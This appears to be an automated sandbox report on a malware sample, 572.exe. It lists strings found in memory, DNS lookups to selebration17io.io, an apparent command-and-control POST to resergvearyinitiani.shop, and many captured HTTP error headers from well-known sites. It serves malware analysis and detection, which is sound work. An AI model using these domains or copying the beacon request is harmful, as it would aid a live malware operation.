                Source: 572.exe, 00000009.00000003.4184636529.0000000047AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <LI><A class="link_youtube" title="YouTube" href="https://www.youtube.com/canalcaixa">YouTube</A> </LI></UL></DIV> equals www.youtube.com (Youtube)
                Source: 572.exe, 00000009.00000003.4373730161.0000000063DEC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <a href="https://www.facebook.com/wrplus" target="_blank"><i class="fa fa-facebook"></i></a> equals www.facebook.com (Facebook)
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <a href="https://www.facebook.com/zoom" class="icon" target="_blank"> equals www.facebook.com (Facebook)
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <a href="https://www.linkedin.com/company/zoom-video-communications/" class="icon" target="_blank"> equals www.linkedin.com (Linkedin)
                Source: 572.exe, 00000009.00000003.4373730161.0000000063DEC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <a href="https://www.youtube.com/warriorplusvideo" target="_blank"><i class="fa fa-youtube"></i></a> equals www.youtube.com (Youtube)
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <a href="https://www.youtube.com/zoommeetings" class="icon" target="_blank"> equals www.youtube.com (Youtube)
                Source: 572.exe, 00000009.00000003.4373730161.0000000063E5F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <div class="blockLink"><i class="fas fa-caret-right"></i><a class=" " href="https://www.facebook.com/groups/242772140713946">PatronHub facebook group</a></div> equals www.facebook.com (Facebook)
                Source: 572.exe, 00000009.00000003.4373730161.0000000063DEC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4572467958.000000000595D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <div class="fb-like overflow-hidden w-100" data-href="https://www.facebook.com/wrplus" data-width="240" data-layout="standard" data-action="like" data-size="small" data-show-faces="true" data-share="false" data-colorscheme="dark"></div> equals www.facebook.com (Facebook)
                Source: 572.exe, 00000009.00000003.4028547496.0000000047B3A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3991523314.0000000040415000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3908338136.000000006417B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: src="https://www.facebook.com/tr?id=708505188065970&ev=PageView&noscript=1" equals www.facebook.com (Facebook)
                Source: unknown DNS traffic detected: queries for: selebration17io.io
                Source: unknown HTTP traffic detected: POST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: application/x-www-form-urlencoded
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 8
                Host: resergvearyinitiani.shop
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:14:53 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Frame-Options: SAMEORIGINX-Xss-Protection: 1; mode=blockCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 850abb7baea40701-ATL
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:14:53 GMTServer: ApacheX-Frame-Options: SAMEORIGINStrict-Transport-Security: max-age=31536000; includeSubDomainsContent-Length: 954Connection: closeContent-Type: text/html; charset=UTF-8
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:14:53 GMTContent-Type: text/htmlContent-Length: 7358Connection: closeServer: nginx/1.12.2Vary: Accept-EncodingETag: "5df8f9a3-1cbe"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 05 Feb 2024 11:14:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedReport-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreportContent-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreportCross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"X-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockServer: GSEAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:14:53 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 282Connection: closeContent-Type: text/html; charset=iso-8859-1
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:14:53 GMTServer: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.6.0 (N;ecid=1409681332155852,0:1)Content-Type: text/html; charset=iso-8859-1Content-Length: 194Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:14:53 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=j1NQmeDGwT4WqqDTUDXGAhu0PP9D2Tbo1BhthUi5TUJJtjCmuK3djBde99Qv3hTQe7eR3W0ruJQa47TqPxHETmSKhhpYhRq%2Fa7WKjrk5sZQzg%2Bo5DQ4lsSVH9R4K4TNQOGcd05L9dzeU54s%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 850abb7a6d1d672f-ATL
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html;charset=utf-8vary: Accept-Encodingset-cookie: sc-wcid=22d74ccb-015c-4e3d-b87e-d8ca27d63248; Path=/; Domain=.snapchat.com; Expires=Tue, 06-Feb-2024 11:14:53 GMT; Max-Age=86400; Secureexpires: Thu, 01 Jan 1970 00:00:00 GMTstrict-transport-security: max-age=31536000; includeSubdomainsx-xss-protection: 1; mode=blockx-content-type-options: nosniffx-frame-options: allow-from https://iframe.arkoselabs.comcache-control: no-cache, no-store, max-age=0content-security-policy: default-src 'self'; script-src 'self' 'sha256-93ejg12EAT+6aW5hUFXASC0su+RZ+zOjgnJgLqJaLmY=' https://sc-static.net https://www.google-analytics.com https://www.googletagmanager.com https://snap-api.arkoselabs.com/ https://www.google.com/recaptcha/ https://www.google.com/js https://www.gstatic.com/ https://apis.google.com/ https://tr.snapchat.com/config/com/49966cac-c23c-49c7-9ff9-c7f8f6f771ba.js; font-src 'self' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net data:; style-src 'self' 'unsafe-inline' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net blob:; frame-src 'self' https://iframe.arkoselabs.com https://snap-api.arkoselabs.com https://tr.snapchat.com https://www.google.com/ https://client-api.arkoselabs.com/; connect-src 'self' https://graphql.contentful.com/content/v1/spaces/kp51zybwznx4/environments/master https://snap-api.arkoselabs.com/ https://tr.snapchat.com https://www.snapchat.com https://accounts.snapchat.com https://web-frontend-dot-sc-analytics.appspot.com https://us-central1-gcp.api.snapchat.com https://staging-us-central1-gcp.api.snapchat.com https://www.google-analytics.com https://sentry.sc-prod.net https://cdn.contentful.com/spaces/kp51zybwznx4/ https://accounts.snap.com/ https://web.snapchat.com/ https://gcp.api.snapchat.com https://story.snapchat.com https://aws.api.snapchat.com/snapchat.cdp.cof.CircumstancesService/targetingQuery 
https://aws.api.snapchat.com/snapchat.ab.exposure_service.ExposureService/BatchUpdateAbExposure https://chat-gold.sc-corp.net; img-src 'self' data: https://ssl.gstatic.com https://www.snapchat.com https://sc-oauth2-client-icons-dev.storage.googleapis.com https://sc-oauth2-client-icons.storage.googleapis.com https://storage.googleapis.com https://www.google-analytics.com https://images.ctfassets.net https://sdk.bitmoji.com; media-src 'self' https://storage.googleapis.com; form-action 'self' https://*.snap.com https://*.snapchat.com https://*.snap-dev.net https://*.sc-corp.net https://localhost:3000; frame-ancestors https://iframe.arkoselabs.com https://profile.softserve-local-prod.snap-dev.net https://preproduction-dot-snap-profile-manager.snapchat.com https://hotfix-dot-snap-profile-manager.snapchat.com https://snap-profile-manager.snapchat.com https://profile-preprod.snapchat.com https://business-preprod.snapchat.com https://profile.snapchat.com https://business.snapchat.com https://enterprise.snap.com;x-content-security-policy: default-src 'self'; script-
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:14:53 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeserver: envoydate: Mon, 05 Feb 2024 11:16:07 GMTcontent-security-policy: frame-ancestors https://*.booking.com 'self'; report-uri https://nellie.booking.com/csp-report-uri?type=block&tag=212&pid=7ca24f3b5c0f003b&e=UmFuZG9tSVYkc2RlIyh9YSWKtKO5TxgOpTwVTPfHZKNW3Hcrm1RLgTofTsWVfilMYde8P2VbypUEfLchvSEFGAJezDrMX5xOf59abzqp9DKM_9-kmek_KAcontent-security-policy-report-only: base-uri 'none'; connect-src saa.booking.com secure.booking.com reports.booking.com privacyportal-eu.onetrust.com geolocation.onetrust.com cdn.cookielaw.org www.google-analytics.com *.perimeterx.net *.pxchk.net *.px-cdn.net *.px-client.net *.px-cloud.net 'self' 'report-sample'; default-src *.bstatic.com bstatic.com 'self'; frame-src https://www.youtube.com/embed/Vv4w5SmRkss *.bstatic.com https://www.google.com bstatic.com www.booking.com secure.booking.com paymentcomponent.booking.com 'self'; img-src 'self' data: www.booking.com graph.facebook.com cdn.cookielaw.org account.booking.com *.bstatic.com bstatic.com *.static.booking.cn www.google-analytics.com www.google.com stats.g.doubleclick.net *.px-cloud.net *.perimeterx.net www.gstatic.com; object-src 'none'; report-uri https://nellie.booking.com/csp-report-uri?type=report&tag=213&pid=7ca24f3b5c0f003b&e=UmFuZG9tSVYkc2RlIyh9YSWKtKO5TxgOpTwVTPfHZKNW3Hcrm1RLgTofTsWVfilMYde8P2VbypUEfLchvSEFGAJezDrMX5xOf59abzqp9DKM_9-kmek_KA; script-src saa.booking.com *.bstatic.com bstatic.com *.static.booking.cn www.google.com www.google-analytics.com cdn.cookielaw.org geolocation.onetrust.com 'self' 'nonce-qg33KKQUzYnzfDG' 'report-sample'; style-src *.bstatic.com bstatic.com *.static.booking.cn 'self' 'unsafe-inline'x-xss-protection: 1; mode=blockstrict-transport-security: max-age=86400; includeSubDomainsX-Cache: Error from cloudfrontVia: 1.1 57674a900f587a3a1f1571205e001c6c.cloudfront.net 
(CloudFront)X-Amz-Cf-Pop: ATL59-P5X-Amz-Cf-Id: UJ-tXhDVustfeRTAoDJdwDRthW-1YUhMwnI7BBaVXt6BJ-zAFdwIOA==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:08 GMTContent-Type: text/html;charset=utf-8Transfer-Encoding: chunkedConnection: closex-zm-trackingid: v=2.0;clid=aw1;rid=WEB_6455cff9bec81e85c104a918f9ef0987x-content-type-options: nosniffcontent-security-policy: upgrade-insecure-requests; default-src https://*.zoom.us https://zoom.us blob: 'self'; img-src https: about: blob: data: 'self'; style-src https: safari-extension: chrome-extension: 'unsafe-inline' data: 'self'; font-src https: safari-extension: chrome-extension: blob: data: 'self'; connect-src * about: blob: data: 'self'; media-src * rtmp: blob: data: 'self'; frame-src https: ms-appx-web: zoommtg: zoomus: wvjbscheme: zoomprc: data: blob: 'self'; object-src 'none'; base-uri 'none';script-src 'self' 'strict-dynamic' 'nonce-BCeN5OvgRbWKWthsB8G9pg' 'unsafe-inline' blob: https:;x-frame-options: SAMEORIGINset-cookie: zm_aid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnlyset-cookie: zm_haid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnlyset-cookie: zm_tmaid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnlyset-cookie: zm_htmaid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnly
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:08 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Frame-Options: SAMEORIGINX-Xss-Protection: 1; mode=blockCF-Cache-Status: HITServer: cloudflareCF-RAY: 850abd515c5db029-ATL
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Type: text/htmlNgrok-Error-Code: ERR_NGROK_3200Ngrok-Trace-Id: c2e440e820bef3ad20b52a5585ed00edReferrer-Policy: no-referrerDate: Mon, 05 Feb 2024 11:16:10 GMTTransfer-Encoding: chunked
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:10 GMTServer: Apache/2.4.41 (Ubuntu)Expires: 0Cache-Control: no-cache, no-store, max-age=0, must-revalidateX-Powered-By: JSP/2.2Set-Cookie: JSESSIONID=w0MJPTHCHLZiEcNbGbud2a8h.cmrsanmartin; path=/X-XSS-Protection: 1; mode=blockPragma: no-cacheX-Frame-Options: SAMEORIGINX-Robots-Tag: noindex,noarchiveX-Content-Type-Options: nosniffStrict-Transport-Security: max-age=31536000 ; includeSubDomainsContent-Type: text/html;charset=UTF-8Content-Language: es-CLConnection: closeTransfer-Encoding: chunked
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 05 Feb 2024 11:16:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedReport-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreportContent-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreportCross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"X-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockServer: GSEAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 05 Feb 2024 11:16:10 GMTContent-Type: text/html; charset=UTF-8Content-Length: 12972Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINcf-mitigated: challengeCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTServer: cloudflareCF-RAY: 850abd5c3f561d62-ATLalt-svc: h3=":443"; ma=86400
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingServer: nginx/1.17.9X-Powered-By: PHP/8.2.4Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cachex-imvu-rnd: cE3wuo3TA1SD1
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html;charset=utf-8vary: Accept-Encodingset-cookie: sc-wcid=b740351c-8fe3-4e92-abf0-9c45e891561b; Path=/; Domain=.snapchat.com; Expires=Tue, 06-Feb-2024 11:16:10 GMT; Max-Age=86400; Secureexpires: Thu, 01 Jan 1970 00:00:00 GMTstrict-transport-security: max-age=31536000; includeSubdomainsx-xss-protection: 1; mode=blockx-content-type-options: nosniffx-frame-options: allow-from https://iframe.arkoselabs.comcache-control: no-cache, no-store, max-age=0content-security-policy: default-src 'self'; script-src 'self' 'sha256-93ejg12EAT+6aW5hUFXASC0su+RZ+zOjgnJgLqJaLmY=' https://sc-static.net https://www.google-analytics.com https://www.googletagmanager.com https://snap-api.arkoselabs.com/ https://www.google.com/recaptcha/ https://www.google.com/js https://www.gstatic.com/ https://apis.google.com/ https://tr.snapchat.com/config/com/49966cac-c23c-49c7-9ff9-c7f8f6f771ba.js; font-src 'self' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net data:; style-src 'self' 'unsafe-inline' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net blob:; frame-src 'self' https://iframe.arkoselabs.com https://snap-api.arkoselabs.com https://tr.snapchat.com https://www.google.com/ https://client-api.arkoselabs.com/; connect-src 'self' https://graphql.contentful.com/content/v1/spaces/kp51zybwznx4/environments/master https://snap-api.arkoselabs.com/ https://tr.snapchat.com https://www.snapchat.com https://accounts.snapchat.com https://web-frontend-dot-sc-analytics.appspot.com https://us-central1-gcp.api.snapchat.com https://staging-us-central1-gcp.api.snapchat.com https://www.google-analytics.com https://sentry.sc-prod.net https://cdn.contentful.com/spaces/kp51zybwznx4/ https://accounts.snap.com/ https://web.snapchat.com/ https://gcp.api.snapchat.com https://story.snapchat.com https://aws.api.snapchat.com/snapchat.cdp.cof.CircumstancesService/targetingQuery 
https://aws.api.snapchat.com/snapchat.ab.exposure_service.ExposureService/BatchUpdateAbExposure https://chat-gold.sc-corp.net; img-src 'self' data: https://ssl.gstatic.com https://www.snapchat.com https://sc-oauth2-client-icons-dev.storage.googleapis.com https://sc-oauth2-client-icons.storage.googleapis.com https://storage.googleapis.com https://www.google-analytics.com https://images.ctfassets.net https://sdk.bitmoji.com; media-src 'self' https://storage.googleapis.com; form-action 'self' https://*.snap.com https://*.snapchat.com https://*.snap-dev.net https://*.sc-corp.net https://localhost:3000; frame-ancestors https://iframe.arkoselabs.com https://profile.softserve-local-prod.snap-dev.net https://preproduction-dot-snap-profile-manager.snapchat.com https://hotfix-dot-snap-profile-manager.snapchat.com https://snap-profile-manager.snapchat.com https://profile-preprod.snapchat.com https://business-preprod.snapchat.com https://profile.snapchat.com https://business.snapchat.com https://enterprise.snap.com;x-content-security-policy: default-src 'self'; script-
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:10 GMTContent-Type: text/html;charset=utf-8Transfer-Encoding: chunkedConnection: closex-zm-trackingid: v=2.0;clid=us04;rid=WEB_c5bf5ac2aebc8892112b64213b1f192dx-content-type-options: nosniffcontent-security-policy: upgrade-insecure-requests; default-src https://*.zoom.us https://zoom.us blob: 'self'; img-src https: about: blob: data: 'self'; style-src https: safari-extension: chrome-extension: 'unsafe-inline' data: 'self'; font-src https: safari-extension: chrome-extension: blob: data: 'self'; connect-src * about: blob: data: 'self'; media-src * rtmp: blob: data: 'self'; frame-src https: ms-appx-web: zoommtg: zoomus: wvjbscheme: zoomprc: data: blob: 'self'; object-src 'none'; base-uri 'none';script-src 'self' 'strict-dynamic' 'nonce-smzSSlJ9TB-BNoLtyBrhWQ' 'unsafe-inline' blob: https:;x-frame-options: SAMEORIGINset-cookie: zm_aid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnlyset-cookie: zm_haid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnlyset-cookie: zm_tmaid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnlyset-cookie: zm_htmaid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnly
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Mon, 05 Feb 2024 11:17:36 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:10 GMTContent-Type: text/htmlContent-Length: 7358Connection: closeServer: nginx/1.12.2Vary: Accept-EncodingETag: "5df8f9a3-1cbe"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundVary: Accept-EncodingSet-Cookie: fr=0RMlcudAnFvKbatpJ..BlwMN6.Hq.AAA.0.0.BlwMN6.AWWgnHCw83c; expires=Sun, 05-May-2024 11:16:10 GMT; Max-Age=7776000; path=/; domain=.facebook.com; secure; httponlyreporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0"report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Type: text/htmlNgrok-Error-Code: ERR_NGROK_3200Ngrok-Trace-Id: 7e51c86663c7b523fa199cebb69dfc45Referrer-Policy: no-referrerDate: Mon, 05 Feb 2024 11:16:10 GMTTransfer-Encoding: chunked
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:10 GMTServer: Apache/2.4.41 (Ubuntu)Expires: 0Cache-Control: no-cache, no-store, max-age=0, must-revalidateX-Powered-By: JSP/2.2Set-Cookie: JSESSIONID=dw-1Bdqxl86HApBORrnH4OZj.cmrsanmartin; path=/X-XSS-Protection: 1; mode=blockPragma: no-cacheX-Frame-Options: SAMEORIGINX-Robots-Tag: noindex,noarchiveX-Content-Type-Options: nosniffStrict-Transport-Security: max-age=31536000 ; includeSubDomainsContent-Type: text/html;charset=UTF-8Content-Language: es-CLConnection: closeTransfer-Encoding: chunked
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETStrict-Transport-Security: max-age=31536000; includeSubDomainsDate: Mon, 05 Feb 2024 11:16:09 GMTConnection: closeContent-Length: 1245X-CDN: ImpervaX-Iinfo: 32-27693990-27694186 NNNY CT(119 138 0) RT(1707131768430 1678) q(0 0 0 -1) r(0 1) U24
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:10 GMTServer: ApacheX-Frame-Options: SAMEORIGINStrict-Transport-Security: max-age=31536000; includeSubDomainsContent-Length: 954Connection: closeContent-Type: text/html; charset=UTF-8
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDDate: Mon, 05 Feb 2024 11:16:10 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Frame-Options: SAMEORIGIN
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeserver: envoydate: Mon, 05 Feb 2024 11:16:10 GMTcontent-security-policy: frame-ancestors https://*.booking.com 'self'; report-uri https://nellie.booking.com/csp-report-uri?type=block&tag=212&pid=efa84f3d83ca000a&e=UmFuZG9tSVYkc2RlIyh9YSWKtKO5TxgOpTwVTPfHZKNW3Hcrm1RLgcLIf0TMqzdZ8YCpErSRx-VJ_NHvJY3I5Gv8mJys8gdUXLaeE-pi64gcontent-security-policy-report-only: base-uri 'none'; connect-src saa.booking.com secure.booking.com reports.booking.com privacyportal-eu.onetrust.com geolocation.onetrust.com cdn.cookielaw.org www.google-analytics.com *.perimeterx.net *.pxchk.net *.px-cdn.net *.px-client.net *.px-cloud.net 'self' 'report-sample'; default-src *.bstatic.com bstatic.com 'self'; frame-src https://www.youtube.com/embed/Vv4w5SmRkss *.bstatic.com https://www.google.com bstatic.com www.booking.com secure.booking.com paymentcomponent.booking.com 'self'; img-src 'self' data: www.booking.com graph.facebook.com cdn.cookielaw.org account.booking.com *.bstatic.com bstatic.com *.static.booking.cn www.google-analytics.com www.google.com stats.g.doubleclick.net *.px-cloud.net *.perimeterx.net www.gstatic.com; object-src 'none'; report-uri https://nellie.booking.com/csp-report-uri?type=report&tag=213&pid=efa84f3d83ca000a&e=UmFuZG9tSVYkc2RlIyh9YSWKtKO5TxgOpTwVTPfHZKNW3Hcrm1RLgcLIf0TMqzdZ8YCpErSRx-VJ_NHvJY3I5Gv8mJys8gdUXLaeE-pi64g; script-src saa.booking.com *.bstatic.com bstatic.com *.static.booking.cn www.google.com www.google-analytics.com cdn.cookielaw.org geolocation.onetrust.com 'self' 'nonce-G7uy4pm4OGXJyfV' 'report-sample'; style-src *.bstatic.com bstatic.com *.static.booking.cn 'self' 'unsafe-inline'x-xss-protection: 1; mode=blockstrict-transport-security: max-age=86400; includeSubDomainsX-Cache: Error from cloudfrontVia: 1.1 cc32f91d3d591d364f0c4e44eaf6525e.cloudfront.net (CloudFront)X-Amz-Cf-Pop: 
ATL59-P5X-Amz-Cf-Id: uFTx0EgRNNejU_cEiOeYjjvxbjwDYmshtbmPo_p877ZYL7_CKRSNgg==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.18.0 (Ubuntu)date: Mon, 05 Feb 2024 11:16:10 GMTcontent-type: text/html; charset=UTF-8transfer-encoding: chunkedvary: Accept-Encodingconnection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 05 Feb 2024 11:16:10 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINcf-mitigated: challengeCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTServer: cloudflareCF-RAY: 850abd5e0b5d6761-ATLalt-svc: h3=":443"; ma=86400
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 05 Feb 2024 11:16:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedContent-Security-Policy: require-trusted-types-for 'script';report-uri /cspreportContent-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreportReport-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"X-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockServer: GSEAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
